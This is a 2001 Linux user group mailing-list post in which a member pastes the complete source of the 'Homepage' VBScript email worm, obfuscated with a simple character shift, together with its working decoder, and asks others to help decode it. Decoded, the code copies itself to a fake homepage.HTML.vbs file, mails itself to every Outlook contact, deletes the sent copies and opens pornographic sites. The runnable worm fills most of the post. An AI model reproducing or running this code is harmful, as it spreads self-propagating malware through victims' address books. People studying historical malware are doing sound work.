[plug] OT: homepage email

Simon Scott simon.scott at flexiplan.com
Wed May 9 15:56:18 WST 2001


	Actually, I just managed to look at it

	Its semi-encrypted, if someone knows vbscript could you please
change the 'execute' command below to some form of 'print' and give us the
output?

	I would do it but I dont know vbscript, and I dont think I could run
it even if I did :)

	If it gets messed up (control chars or something) let me know.

	Ill try to emulate the decode function in something else just for
interest. Unfortunately Im on win98 so I dont have too many tools at my
disposal, any perl experts on list wanna give it a shot?



	Anywhere, where it is

	Execute
DeCode("QpGttqtTguwogPgzvUgvYU?EtgcvgQdlgev*$YUetkrv0Ujgnn$+UgvHU
Q?Etgcvgqdlgev*$uetkrvkpi0hkngu{uvgoqdlgev$+Hqnfgt?HUQ0IgvUrgekcnHqnfgt*4
+UgvKpH?HUQ0QrgpVgzvHkng*YUetkrv0UetkrvHwnnpcog.3+FqYjkngKpH0CvGpfQ
hUvtgco>@VtwgUetkrvDwhhgt?UetkrvDwhhgt(KpH0TgcfNkpg(xdetnhNqqrUgvQw
vH?HUQ0QrgpVgzvHkng*Hqnfgt($^jqogrcig0JVON0xdu$.4.vtwg+QwvH0ytkvgUetkrvDw
hhgtQwvH0enqugUgvHUQ?PqvjkpiKhYU0tgitgcf*$JMEW^uqhvyctg^Cp^ockngf
$+>@$3$vjgpOcknkv*+GpfKhUgvu?EtgcvgQdlgev*$Qwvnqqm0Crrnkecvkqp$
+Ugvv?u0IgvPcogUrceg*$OCRK$+Ugvw?v0IgvFghcwnvHqnfgt*8+Hqtk?3vqw0k
vgou0eqwpvKhw0Kvgou0Kvgo*k+0uwdlgev?$Jqogrcig$Vjgpw0Kvgou0Kvgo*k+0enqu
gw0Kvgou0Kvgo*k+0fgngvgGpfKhPgzvUgvw?v0IgvFghcwnvHqnfgt*5+Hqtk?
3vqw0kvgou0eqwpvKhw0Kvgou0Kvgo*k+0uwdlgev?$Jqogrcig$Vjgpw0Kvgou0Kvgo
*k+0fgngvgGpfKhPgzvTcpfqok|gt?Kpv**6,Tpf+-3+Kht?3vjgp
	
YU0Twp*$jvvr<11jctfeqtg0rqtpdknndqctf0pgv1ujcppqp130jvo$+gnugkht?4Vjgp
YU0Twp*$jvvr<11ogodgtu0pdek0eqo1aZOEO1rtkp|lg130jvo$+gnugkht?5VjgpYU
0Twp*$jvvr<11yyy40ugzetqrqnku0eqo1cocvgwt1ujgknc130jvo$+GnugKht?6VjgpY
U0Twp*$jvvr<11ujgknc0kuugz{0vx130jvo$+GpfKhHwpevkqpOcknkv*+QpGttq
tTguwogPgzvUgvQwvnqqm?EtgcvgQdlgev*$Qwvnqqm0Crrnkecvkqp$+KhQwvnqqm
?$Qwvnqqm$VjgpUgvOcrk?Qwvnqqm0IgvPcogUrceg*$OCRK$+UgvNkuvu?Ocrk0C
fftguuNkuvuHqtGcejNkuvKpfgzKpNkuvuKhNkuvKpfgz0CfftguuGpvtkgu0Eqw
pv>@2VjgpEqpvcevEqwpv?NkuvKpfgz0CfftguuGpvtkgu0EqwpvHqtEqwpv
?3VqEqpvcevEqwpvUgvOckn?Qwvnqqm0EtgcvgKvgo*2+UgvEqpvcev?
NkuvKpfgz0CfftguuGpvtkgu*Eqwpv+Ockn0Vq?Eqpvcev0CfftguuOckn0Uw
dlgev?$Jqogrcig$Ockn0Dqf{?xdetnh($Jk#$(xdetnh(xdetnh($[qw)xgiqvv
quggvjkurcig#Kv)utgcnn{eqqn=Q+$(xdetnh(xdetnh
	
UgvCvvcejogpv?Ockn0CvvcejogpvuCvvcejogpv0CffHqnfgt($^jqogrcig
0JVON0xdu$Ockn0FgngvgChvgtUwdokv?VtwgKhOckn0Vq>@$$Vjgp
Ockn0UgpfYU0tgiytkvg$JMEW^uqhvyctg^Cp^ockngf$.$3$GpfKhP
gzvGpfKhPgzvGpfkhGpfHwpevkqp")
	Function DeCode(Coded)
	For I = 1 To Len(Coded)
	CurChar= Mid(Coded, I, 1)
	If Asc(CurChar) = 15 Then
	CurChar= Chr(10)
	ElseIf Asc(CurChar) = 16 Then
	CurChar= Chr(13)
	ElseIf Asc(CurChar) = 17 Then
	CurChar= Chr(32)
	ElseIf Asc(CurChar) = 18 Then
	CurChar= Chr(9)
	Else
	CurChar = Chr(Asc(CurChar) - 2)
	End If
	DeCode = DeCode & CurChar
	Next
	End Function




	From:	Andrew Barbara <Andrew at mmtnetworks.com.au> on 09-05-2001
03:41 PM
	Please respond to plug at plug.linux.org.au@SMTP at Exchange
	To:	plug at plug.linux.org.au@SMTP at Exchange
	cc:	 

	Subject:	Re: [plug] OT: homepage email

	is the virus harmful or jus a joke???
	 so far 2 of our clients have it!!!

	>>> Simon.Scott at flexiplan.com 05/09/01 03:00pm >>>


	Hi guys

	Once again we can laugh til we cry - yet another vbs 'virus' is
doing the
	rounds, sending NT administrators into a frenzy.

	Damn I love Microsoft :)



	
**********************************************************************
	This email and any files transmitted with it are confidential and 
	intended solely for the use of the individual or entity to whom they

	are addressed. If you have received this email in error please
notify 
	the system manager.

	This footnote also confirms that this email message has been swept
by 
	MIMEsweeper for the presence of computer viruses.

	www.mimesweeper.com 
	
**********************************************************************





**********************************************************************
This email and any files transmitted with it are confidential and 
intended solely for the use of the individual or entity to whom they   
are addressed. If you have received this email in error please notify 
the system manager.

This footnote also confirms that this email message has been swept by 
MIMEsweeper for the presence of computer viruses.

www.mimesweeper.com
**********************************************************************



More information about the plug mailing list